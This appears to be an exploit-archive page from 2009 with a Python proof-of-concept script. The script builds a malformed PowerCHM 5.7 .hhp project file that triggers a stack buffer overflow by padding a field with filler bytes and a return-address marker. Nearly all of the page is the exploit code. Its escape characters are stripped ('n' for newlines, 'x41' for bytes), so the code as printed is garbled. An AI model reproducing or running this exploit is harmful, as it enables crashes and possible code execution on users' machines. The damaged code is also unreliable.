PowerCHM 5.7 (hhp File) Stack Overflow poC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PowerCHM 5.7 (hhp File) Stack Overflow poC
# Published : 2009-03-27
# Author : Encrypt3d.M!nd
# Previous Title : XM Easy Personal FTP Server <= 5.7.0 (NLST) DoS Exploit
# Next Title : Mozilla Firefox XSL Parsing Remote Memory Corruption PoC 0day

# exploit.py
# PowerCHM 5.7 (hhp file) Stack overflow PoC
# By:Encrypt3d.M!nd
#
# Orginally Discovered by:
# Biks Security (http://security.biks.vn/?p=365)
#

header = (
"[OPTIONS]n"
"Compatibility=1.1 or latern"
"Compiled file=bratax.chmn"
"Contents file=aaaaaa.hhcn"
"Index file=aaaaaa.hhkn"
"Language=0x813 Dutch (Belgium)n"
"Title=n"
"Error log file=Errlog.txtn"
"Default Window=mainnn"
"[WINDOWS]n"
'main="","aaaaaa.hhc","aaaaaa.hhk","","",,,,,0x41520,240,0x184E,[262,184,762,584],,,,0,0,0,0nn'
"[FILES]nn"
"[INFOTYPES]n")

file=open('poc.hhp','w')
file.write(header+"x41"*999+"x42x42x42x42"+"x43"*500)
file.close()

# www.Syue.com [2009-03-27]